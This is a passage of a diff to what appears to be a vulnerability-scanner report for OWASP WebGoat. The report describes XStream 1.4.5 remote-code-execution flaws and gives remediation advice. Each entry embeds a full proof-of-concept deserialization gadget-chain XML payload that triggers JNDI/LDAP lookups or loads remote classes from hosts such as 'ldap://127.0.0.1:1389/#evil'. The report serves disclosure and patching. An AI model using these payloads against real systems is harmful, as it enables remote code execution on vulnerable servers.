</com.sun.jndi.ldap.LdapAttribute>\r\n                                  <com.sun.jndi.ldap.LdapAttribute serialization='custom'>\r\n                                    <javax.naming.directory.BasicAttribute>\r\n                                      <default>\r\n                                        <ordered>false</ordered>\r\n                                        <attrID>javaClassName</attrID>\r\n                                      </default>\r\n                                      <int>1</"
+                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\r\n\r\n\r\n## PoC\r\n\r\n```\r\n<javax.swing.event.EventListenerList serialization='custom'>\r\n  <javax.swing.event.EventListenerList>\r\n    <default>\r\n      <listenerList>\r\n        <javax.swing.undo.UndoManager>\r\n          <hasBeenDone>true</hasBeenDone>\r\n          <alive>true</alive>\r\n          <inProgress>true</inProgress>\r\n          <edits>\r\n            <com.sun.xml.internal.ws.api.message.Packet>\r\n              <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>\r\n                <parsedMessage>true</parsedMessage>\r\n                <soapVersion>SOAP_11</soapVersion>\r\n                <bodyParts/>\r\n                <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>\r\n                  <attachmentsInitialized>false</attachmentsInitialized>\r\n                  <multiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'>\r\n                    <soapPart/>\r\n                    <mm>\r\n                      <it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>\r\n                        <aliases class='com.sun.jndi.ldap.LdapBindingEnumeration'>\r\n                          <cleaned>false</cleaned>\r\n                          <entries>\r\n                            <com.sun.jndi.ldap.LdapEntry>\r\n                              <DN>cn=four,cn=three,cn=two,cn=one</DN>\r\n                              <attributes class='javax.naming.directory.BasicAttributes' serialization='custom'>\r\n                                <javax.naming.directory.BasicAttribute>\r\n                                  <default>\r\n                                    <ignoreCase>false</ignoreCase>\r\n                                  </default>\r\n                                  <int>4</int>\r\n                                  <com.sun.jndi.ldap.LdapAttribute serialization='custom'>\r\n                                    <javax.naming.directory.BasicAttribute>\r\n                                      <default>\r\n                                        <ordered>false</ordered>\r\n                                        <attrID>objectClass</attrID>\r\n                                      </default>\r\n                                      <int>1</int>\r\n                                      <string>javanamingreference</string>\r\n                                    </javax.naming.directory.BasicAttribute>\r\n                                    <com.sun.jndi.ldap.LdapAttribute>\r\n                                      <default>\r\n                                        <rdn class='com.sun.jndi.ldap.LdapName' serialization='custom'>\r\n                                          <com.sun.jndi.ldap.LdapName>\r\n                                            <string>cn=four,cn=three,cn=two,cn=one</string>\r\n                                            <boolean>false</boolean>\r\n                                          </com.sun.jndi.ldap.LdapName>\r\n                                        </rdn>\r\n                                      </default>\r\n                                    </com.sun.jndi.ldap.LdapAttribute>\r\n                                  </com.sun.jndi.ldap.LdapAttribute>\r\n                                  <com.sun.jndi.ldap.LdapAttribute serialization='custom'>\r\n                                    <javax.naming.directory.BasicAttribute>\r\n                                      <default>\r\n                                        <ordered>false</ordered>\r\n                                        <attrID>javaCodeBase</attrID>\r\n                                      </default>\r\n                                      <int>1</int>\r\n                                      <string>http://127.0.0.1:8080/</string>\r\n                                    </javax.naming.directory.BasicAttribute>\r\n                                    <com.sun.jndi.ldap.LdapAttribute>\r\n                                      <default/>\r\n                                    </com.sun.jndi.ldap.LdapAttribute>\r\n                                  </com.sun.jndi.ldap.LdapAttribute>\r\n                                  <com.sun.jndi.ldap.LdapAttribute serialization='custom'>\r\n                                    <javax.naming.directory.BasicAttribute>\r\n                                      <default>\r\n                                        <ordered>false</ordered>\r\n                                        <attrID>javaClassName</attrID>\r\n                                      </default>\r\n                                      <int>1</int>\r\n                                      <string>refObj</string>\r\n                                    </javax.naming.directory.BasicAttribute>\r\n                                    <com.sun.jndi.ldap.LdapAttribute>\r\n                                      <default/>\r\n                                    </com.sun.jndi.ldap.LdapAttribute>\r\n                                  </com.sun.jndi.ldap.LdapAttribute>\r\n                                  <com.sun.jndi.ldap.LdapAttribute serialization='custom'>\r\n                                    <javax.naming.directory.BasicAttribute>\r\n                                      <default>\r\n                                        <ordered>false</ordered>\r\n                                        <attrID>javaFactory</attrID>\r\n                                      </default>\r\n                                      <int>1</int>\r\n                                      <string>ExecTemplateJDK7</string>\r\n                                    </javax.naming.directory.BasicAttribute>\r\n                                    <com.sun.jndi.ldap.LdapAttribute>\r\n                                      <default/>\r\n                                    </com.sun.jndi.ldap.LdapAttribute>\r\n                                  </com.sun.jndi.ldap.LdapAttribute>\r\n                                </javax.naming.directory.BasicAttribute>\r\n                              </attributes>\r\n                            </com.sun.jndi.ldap.LdapEntry>\r\n                          </entries>\r\n                          <limit>2</limit>\r\n                          <posn>0</posn>\r\n                          <homeCtx/>\r\n                          <more>true</more>\r\n                          <hasMoreCalled>true</hasMoreCalled>\r\n                        </aliases>\r\n                      </it>\r\n                    </mm>\r\n                  </multiPart>\r\n                </sm>\r\n              </message>\r\n            </com.sun.xml.internal.ws.api.message.Packet>\r\n          </edits>\r\n          <indexOfNextAdd>0</indexOfNextAdd>\r\n          <limit>100</limit>\r\n        </javax.swing.undo.UndoManager>\r\n      </listenerList>\r\n    </default>\r\n    <string>java.lang.InternalError</string>\r\n    <javax.swing.undo.UndoManager reference='../default/listenerList/javax.swing.undo.UndoManager'/>\r\n    <null/>\r\n  </javax.swing.event.EventListenerList>\r\n</javax.swing.event.EventListenerList>\r\n```\r\n\r\n```\r\nXStream xstream = new XStream();\r\nxstream.fromXML(xml);\r\n```\n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.18 or higher.\n# References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-39151.html)\n- [XStream Changelog](https://x-stream.github.io/changes.html#1.4.18)\n"
               },
               "properties": {
-                "tags": [
-                  "security",
-                  "CWE-434",
-                  "maven"
-                ],
+                "tags": ["security", "CWE-434", "maven"],
                 "cvssv3_baseScore": 8.5,
                 "security-severity": "8.5"
               }
@@ -662,14 +382,10 @@
               },
               "help": {
                 "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\r\n\r\n\r\n## PoC\r\n\r\n```\r\n<sorted-set>\r\n  <javax.naming.ldap.Rdn_-RdnEntry>\r\n    <type>test</type>\r\n    <value class='javax.swing.MultiUIDefaults' serialization='custom'>\r\n      <unserializable-parents/>\r\n      <hashtable>\r\n          <default>\r\n            <loadFactor>0.75</loadFactor>\r\n            <threshold>525</threshold>\r\n          </default>\r\n          <int>700</int>\r\n          <int>0</int>\r\n      </hashtable>\r\n      <javax.swing.UIDefaults>\r\n          <default>\r\n            <defaultLocale>zh_CN</defaultLocale>\r\n            <resourceCache/>\r\n          </default>\r\n      </javax.swing.UIDefaults>\r\n      <javax.swing.MultiUIDefaults>\r\n          <default>\r\n            <tables>\r\n            <javax.swing.UIDefaults serialization='custom'>\r\n              <unserializable-parents/>\r\n              <hashtable>\r\n                <default>\r\n                  <loadFactor>0.75</loadFactor>\r\n                  <threshold>525</threshold>\r\n                </default>\r\n                <int>700</int>\r\n                <int>1</int>\r\n                <string>lazyValue</string>\r\n                <javax.swing.UIDefaults_-ProxyLazyValue>\r\n                  <className>javax.naming.InitialContext</className>\r\n                  <methodName>doLookup</methodName>\r\n                  <args>\r\n                    <string>ldap://127.0.0.1:1389/#evil</string>\r\n                  </args>\r\n                </javax.swing.UIDefaults_-ProxyLazyValue>\r\n              </hashtable>\r\n              <javax.swing.UIDefaults>\r\n                <default>\r\n                  <defaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/>\r\n                  <resourceCache/>\r\n                </default>\r\n              </javax.swing.UIDefaults>\r\n            </javax.swing.UIDefaults>\r\n            </tables>\r\n          </default>\r\n      </javax.swing.MultiUIDefaults>\r\n    </value>\r\n  </javax.naming.ldap.Rdn_-RdnEntry>\r\n  <javax.naming.ldap.Rdn_-RdnEntry>\r\n    <type>test</type>\r\n    <value class='com.sun.org.apache.xpath.internal.objects.XString'>\r\n      <m__obj class='string'>test</m__obj>\r\n    </value>\r\n  </javax.naming.ldap.Rdn_-RdnEntry>\r\n</sorted-set>\r\n```\r\n\r\n```\r\nXStream xstream = new XStream();\r\nxstream.fromXML(xml);\r\n```\n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.18 or higher.\n# References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-39146.html)\n- [XStream Changelog](https://x-stream.github.io/changes.html#1.4.18)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-39146.yaml)\n"
+                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\r\n\r\n\r\n## PoC\r\n\r\n```\r\n<sorted-set>\r\n  <javax.naming.ldap.Rdn_-RdnEntry>\r\n    <type>test</type>\r\n    <value class='javax.swing.MultiUIDefaults' serialization='custom'>\r\n      <unserializable-parents/>\r\n      <hashtable>\r\n          <default>\r\n            <loadFactor>0.75</loadFactor>\r\n            <threshold>525</threshold>\r\n          </default>\r\n          <int>700</int>\r\n          <int>0</int>\r\n      </hashtable>\r\n      <javax.swing.UIDefaults>\r\n          <default>\r\n            <defaultLocale>zh_CN</defaultLocale>\r\n            <resourceCache/>\r\n          </default>\r\n      </javax.swing.UIDefaults>\r\n      <javax.swing.MultiUIDefaults>\r\n          <default>\r\n            <tables>\r\n            <javax.swing.UIDefaults serialization='custom'>\r\n              <unserializable-parents/>\r\n              <hashtable>\r\n                <default>\r\n                  <loadFactor>0.75</loadFactor>\r\n                  <threshold>525</threshold>\r\n                </default>\r\n                <int>700</int>\r\n                <int>1</int>\r\n                <string>lazyValue</string>\r\n                <javax.swing.UIDefaults_-ProxyLazyValue>\r\n                  <className>javax.naming.InitialContext</className>\r\n                  <methodName>doLookup</methodName>\r\n                  <args>\r\n                    <string>ldap://127.0.0.1:1389/#evil</string>\r\n                  </args>\r\n                </javax.swing.UIDefaults_-ProxyLazyValue>\r\n              </hashtable>\r\n              <javax.swing.UIDefaults>\r\n                <default>\r\n                  <defaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/>\r\n                  <resourceCache/>\r\n                </default>\r\n              </javax.swing.UIDefaults>\r\n            </javax.swing.UIDefaults>\r\n            </tables>\r\n          </default>\r\n      </javax.swing.MultiUIDefaults>\r\n    </value>\r\n  </javax.naming.ldap.Rdn_-RdnEntry>\r\n  <javax.naming.ldap.Rdn_-RdnEntry>\r\n    <type>test</type>\r\n    <value class='com.sun.org.apache.xpath.internal.objects.XString'>\r\n      <m__obj class='string'>test</m__obj>\r\n    </value>\r\n  </javax.naming.ldap.Rdn_-RdnEntry>\r\n</sorted-set>\r\n```\r\n\r\n```\r\nXStream xstream = new XStream();\r\nxstream.fromXML(xml);\r\n```\n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.18 or higher.\n# References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-39146.html)\n- [XStream Changelog](https://x-stream.github.io/changes.html#1.4.18)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-39146.yaml)\n"
               },
               "properties": {
-                "tags": [
-                  "security",
-                  "CWE-434",
-                  "maven"
-                ],
+                "tags": ["security", "CWE-434", "maven"],
                 "cvssv3_baseScore": 8.5,
                 "security-severity": "8.5"
               }
@@ -684,14 +400,10 @@
               },
               "help": {
                 "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\r\n\r\n## PoC\r\n\r\n```\r\n<sorted-set>\r\n  <javax.naming.ldap.Rdn_-RdnEntry>\r\n    <type>ysomap</type>\r\n    <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>\r\n      <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>\r\n        <parsedMessage>true</parsedMessage>\r\n        <soapVersion>SOAP_11</soapVersion>\r\n        <bodyParts/>\r\n        <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>\r\n          <attachmentsInitialized>false</attachmentsInitialized>\r\n          <multiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'>\r\n            <soapPart/>\r\n            <mm>\r\n              <it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>\r\n                <aliases class='com.sun.jndi.toolkit.dir.ContextEnumerator'>\r\n                  <children class='javax.naming.directory.BasicAttribute$ValuesEnumImpl'>\r\n                    <list class='com.sun.xml.internal.dtdparser.SimpleHashtable'>\r\n                      <current>\r\n                        <hash>1</hash>\r\n                        <key class='javax.naming.Binding'>\r\n                          <name>ysomap</name>\r\n                          <isRel>false</isRel>\r\n                            <boundObj class='com.sun.jndi.ldap.LdapReferralContext'>\r\n                              <refCtx class='javax.naming.spi.ContinuationDirContext'>\r\n                                <cpe>\r\n                                  <stackTrace/>\r\n                                  <suppressedExceptions class='java.util.Collections$UnmodifiableRandomAccessList' resolves-to='java.util.Collections$UnmodifiableList'>\r\n                                    <c class='list'/>\r\n                                    <list reference='../c'/>\r\n                                  </suppressedExceptions>\r\n                                  <resolvedObj class='javax.naming.Reference'>\r\n                                    <className>EvilObj</className>\r\n                                    <addrs/>\r\n                                    <classFactory>EvilObj</classFactory>\r\n                                    <classFactoryLocation>http://127.0.0.1:1099/</classFactoryLocation>\r\n                                  </resolvedObj>\r\n                                  <altName class='javax.naming.CompoundName' serialization='custom'>\r\n                                    <javax.naming.CompoundName>\r\n                                      <properties/>\r\n                                      <int>1</int>\r\n                                      <string>ysomap</string>\r\n                                    </javax.naming.CompoundName>\r\n                                  </altName>\r\n                                </cpe>\r\n                              </refCtx>\r\n                              <skipThisReferral>false</skipThisReferral>\r\n                              <hopCount>0</hopCount>\r\n                            </boundObj>\r\n                        </key>\r\n                      </current>\r\n                      <currentBucket>0</currentBucket>\r\n                      <count>0</count>\r\n                      <threshold>0</threshold>\r\n                    </list>\r\n                  </children>\r\n                  <currentReturned>true</currentReturned>\r\n                  <currentChildExpanded>false</currentChildExpanded>\r\n                  <rootProcessed>true</rootProcessed>\r\n                  <scope>2</scope>\r\n                </aliases>\r\n              </it>\r\n            </mm>\r\n          </multiPart>\r\n        </sm>\r\n      </message>\r\n    </value>\r\n  </javax.naming.ldap.Rdn_-RdnEntry>\r\n  <javax.naming.ldap.Rdn_-RdnEntry>\r\n    <type>ysomap</type>\r\n    <value class='com.sun.org.apache.xpath.internal.objects.XString'>\r\n      <m__obj class='string'>test</m__obj>\r\n    </value>\r\n  </javax.naming.ldap.Rdn_-RdnEntry>\r\n</sorted-set>\r\n```\r\n\r\n```\r\nXStream xstream = new XStream();\r\nxstream.fromXML(xml);\r\n```\n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.18 or higher.\n# References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-39148.html)\n- [XStream Changelog](https://x-stream.github.io/changes.html#1.4.18)\n"
+                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\r\n\r\n## PoC\r\n\r\n```\r\n<sorted-set>\r\n  <javax.naming.ldap.Rdn_-RdnEntry>\r\n    <type>ysomap</type>\r\n    <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>\r\n      <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>\r\n        <parsedMessage>true</parsedMessage>\r\n        <soapVersion>SOAP_11</soapVersion>\r\n        <bodyParts/>\r\n        <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>\r\n          <attachmentsInitialized>false</attachmentsInitialized>\r\n          <multiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'>\r\n            <soapPart/>\r\n            <mm>\r\n              <it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>\r\n                <aliases class='com.sun.jndi.toolkit.dir.ContextEnumerator'>\r\n                  <children class='javax.naming.directory.BasicAttribute$ValuesEnumImpl'>\r\n                    <list class='com.sun.xml.internal.dtdparser.SimpleHashtable'>\r\n                      <current>\r\n                        <hash>1</hash>\r\n                        <key class='javax.naming.Binding'>\r\n                          <name>ysomap</name>\r\n                          <isRel>false</isRel>\r\n                            <boundObj class='com.sun.jndi.ldap.LdapReferralContext'>\r\n                              <refCtx class='javax.naming.spi.ContinuationDirContext'>\r\n                                <cpe>\r\n                                  <stackTrace/>\r\n                                  <suppressedExceptions class='java.util.Collections$UnmodifiableRandomAccessList' resolves-to='java.util.Collections$UnmodifiableList'>\r\n                                    <c class='list'/>\r\n                                    <list reference='../c'/>\r\n                                  </suppressedExceptions>\r\n                                  <resolvedObj class='javax.naming.Reference'>\r\n                                    <className>EvilObj</className>\r\n                                    <addrs/>\r\n                                    <classFactory>EvilObj</classFactory>\r\n                                    <classFactoryLocation>http://127.0.0.1:1099/</classFactoryLocation>\r\n                                  </resolvedObj>\r\n                                  <altName class='javax.naming.CompoundName' serialization='custom'>\r\n                                    <javax.naming.CompoundName>\r\n                                      <properties/>\r\n                                      <int>1</int>\r\n                                      <string>ysomap</string>\r\n                                    </javax.naming.CompoundName>\r\n                                  </altName>\r\n                                </cpe>\r\n                              </refCtx>\r\n                              <skipThisReferral>false</skipThisReferral>\r\n                              <hopCount>0</hopCount>\r\n                            </boundObj>\r\n                        </key>\r\n                      </current>\r\n                      <currentBucket>0</currentBucket>\r\n                      <count>0</count>\r\n                      <threshold>0</threshold>\r\n                    </list>\r\n                  </children>\r\n                  <currentReturned>true</currentReturned>\r\n                  <currentChildExpanded>false</currentChildExpanded>\r\n                  <rootProcessed>true</rootProcessed>\r\n                  <scope>2</scope>\r\n                </aliases>\r\n              </it>\r\n            </mm>\r\n          </multiPart>\r\n        </sm>\r\n      </message>\r\n    </value>\r\n  </javax.naming.ldap.Rdn_-RdnEntry>\r\n  <javax.naming.ldap.Rdn_-RdnEntry>\r\n    <type>ysomap</type>\r\n    <value class='com.sun.org.apache.xpath.internal.objects.XString'>\r\n      <m__obj class='string'>test</m__obj>\r\n    </value>\r\n  </javax.naming.ldap.Rdn_-RdnEntry>\r\n</sorted-set>\r\n```\r\n\r\n```\r\nXStream xstream = new XStream();\r\nxstream.fromXML(xml);\r\n```\n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.18 or higher.\n# References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-39148.html)\n- [XStream Changelog](https://x-stream.github.io/changes.html#1.4.18)\n"
               },
               "properties": {
-                "tags": [
-                  "security",
-                  "CWE-434",
-                  "maven"
-                ],
+                "tags": ["security", "CWE-434", "maven"],
                 "cvssv3_baseScore": 8.5,
                 "security-severity": "8.5"
               }
@@ -706,14 +418,10 @@
               },
               "help": {
                 "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\r\n\r\n## PoC\r\n\r\n```\r\n<sorted-set>\r\n  <javax.naming.ldap.Rdn_-RdnEntry>\r\n    <type>ysomap</type>\r\n    <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>\r\n      <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>\r\n        <parsedMessage>true</parsedMessage>\r\n        <soapVersion>SOAP_11</soapVersion>\r\n        <bodyParts/>\r\n        <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>\r\n          <attachmentsInitialized>false</attachmentsInitialized>\r\n          <multiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'>\r\n            <soapPart/>\r\n            <mm>\r\n              <it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>\r\n                <aliases class='com.sun.jndi.ldap.LdapSearchEnumeration'>\r\n                  <listArg class='javax.naming.CompoundName' serialization='custom'>\r\n                    <javax.naming.CompoundName>\r\n                      <properties/>\r\n                      <int>1</int>\r\n                      <string>ysomap</string>\r\n                    </javax.naming.CompoundName>\r\n                  </listArg>\r\n                  <cleaned>false</cleaned>\r\n                  <res>\r\n                    <msgId>0</msgId>\r\n                    <status>0</status>\r\n                  </res>\r\n                  <enumClnt>\r\n                    <isLdapv3>false</isLdapv3>\r\n                    <referenceCount>0</referenceCount>\r\n                    <pooled>false</pooled>\r\n                    <authenticateCalled>false</authenticateCalled>\r\n                  </enumClnt>\r\n                  <limit>1</limit>\r\n                  <posn>0</posn>\r\n                  <homeCtx>\r\n                    <__contextType>0</__contextType>\r\n                    <port__number>1099</port__number>\r\n                    <hostname>127.0.0.1</hostname>\r\n                    <clnt reference='../../enumClnt'/>\r\n                    <handleReferrals>0</handleReferrals>\r\n                    <hasLdapsScheme>true</hasLdapsScheme>\r\n                    <netscapeSchemaBug>false</netscapeSchemaBug>\r\n                    <referralHopLimit>0</referralHopLimit>\r\n                    <batchSize>0</batchSize>\r\n                    <deleteRDN>false</deleteRDN>\r\n                    <typesOnly>false</typesOnly>\r\n                    <derefAliases>0</derefAliases>\r\n                    <addrEncodingSeparator/>\r\n                    <connectTimeout>0</connectTimeout>\r\n                    <readTimeout>0</readTimeout>\r\n                    <waitForReply>false</waitForReply>\r\n                    <replyQueueSize>0</replyQueueSize>\r\n                    <useSsl>false</useSsl>\r\n                    <useDefaultPortNumber>false</useDefaultPortNumber>\r\n                    <parentIsLdapCtx>false</parentIsLdapCtx>\r\n                    <hopCount>0</hopCount>\r\n                    <unsolicited>false</unsolicited>\r\n                    <sharable>false</sharable>\r\n                    <enumCount>1</enumCount>\r\n                    <closeRequested>false</closeRequested>\r\n                  </homeCtx>\r\n                  <more>true</more>\r\n                  <hasMoreCalled>true</hasMoreCalled>\r\n                  <startName class='javax.naming.ldap.LdapName' serialization='custom'>\r\n                    <javax.naming.ldap.LdapName>\r\n                      <default/>\r\n                      <string>uid=ysomap,ou=oa,dc=example,dc=com</string>\r\n                    </javax.naming.ldap.LdapName>\r\n                  </startName>\r\n                  <searchArgs>\r\n                    <name class='javax.naming.CompoundName' reference='../../listArg'/>\r\n                    <filter>ysomap</filter>\r\n                    <cons>\r\n                      <searchScope>1</searchScope>\r\n                      <timeLimit>0</timeLimit>\r\n                      <derefLink>false</derefLink>\r\n                      <returnObj>true</returnObj>\r\n                      <countLimit>0</countLimit>\r\n                    </cons>\r\n                    <reqAttrs/>\r\n                  </searchArgs>\r\n                  <entries>\r\n                    <com.sun.jndi.ldap.LdapEntry>\r\n                      <DN>uid=songtao.xu,ou=oa,dc=example,dc=com</DN>\r\n                      <attributes class='javax.naming.directory.BasicAttributes' serialization='custom'>\r\n                        <default>\r\n                          <ignoreCase>false</ignoreCase>\r\n                        </default>\r\n        "
+                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\r\n\r\n## PoC\r\n\r\n```\r\n<sorted-set>\r\n  <javax.naming.ldap.Rdn_-RdnEntry>\r\n    <type>ysomap</type>\r\n    <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>\r\n      <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>\r\n        <parsedMessage>true</parsedMessage>\r\n        <soapVersion>SOAP_11</soapVersion>\r\n        <bodyParts/>\r\n        <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>\r\n          <attachmentsInitialized>false</attachmentsInitialized>\r\n          <multiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'>\r\n            <soapPart/>\r\n            <mm>\r\n              <it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>\r\n                <aliases class='com.sun.jndi.ldap.LdapSearchEnumeration'>\r\n                  <listArg class='javax.naming.CompoundName' serialization='custom'>\r\n                    <javax.naming.CompoundName>\r\n                      <properties/>\r\n                      <int>1</int>\r\n                      <string>ysomap</string>\r\n                    </javax.naming.CompoundName>\r\n                  </listArg>\r\n                  <cleaned>false</cleaned>\r\n                  <res>\r\n                    <msgId>0</msgId>\r\n                    <status>0</status>\r\n                  </res>\r\n                  <enumClnt>\r\n                    <isLdapv3>false</isLdapv3>\r\n                    <referenceCount>0</referenceCount>\r\n                    <pooled>false</pooled>\r\n                    <authenticateCalled>false</authenticateCalled>\r\n                  </enumClnt>\r\n                  <limit>1</limit>\r\n                  <posn>0</posn>\r\n                  <homeCtx>\r\n                    <__contextType>0</__contextType>\r\n                    <port__number>1099</port__number>\r\n                    <hostname>127.0.0.1</hostname>\r\n                    <clnt reference='../../enumClnt'/>\r\n                    <handleReferrals>0</handleReferrals>\r\n                    <hasLdapsScheme>true</hasLdapsScheme>\r\n                    <netscapeSchemaBug>false</netscapeSchemaBug>\r\n                    <referralHopLimit>0</referralHopLimit>\r\n                    <batchSize>0</batchSize>\r\n                    <deleteRDN>false</deleteRDN>\r\n                    <typesOnly>false</typesOnly>\r\n                    <derefAliases>0</derefAliases>\r\n                    <addrEncodingSeparator/>\r\n                    <connectTimeout>0</connectTimeout>\r\n                    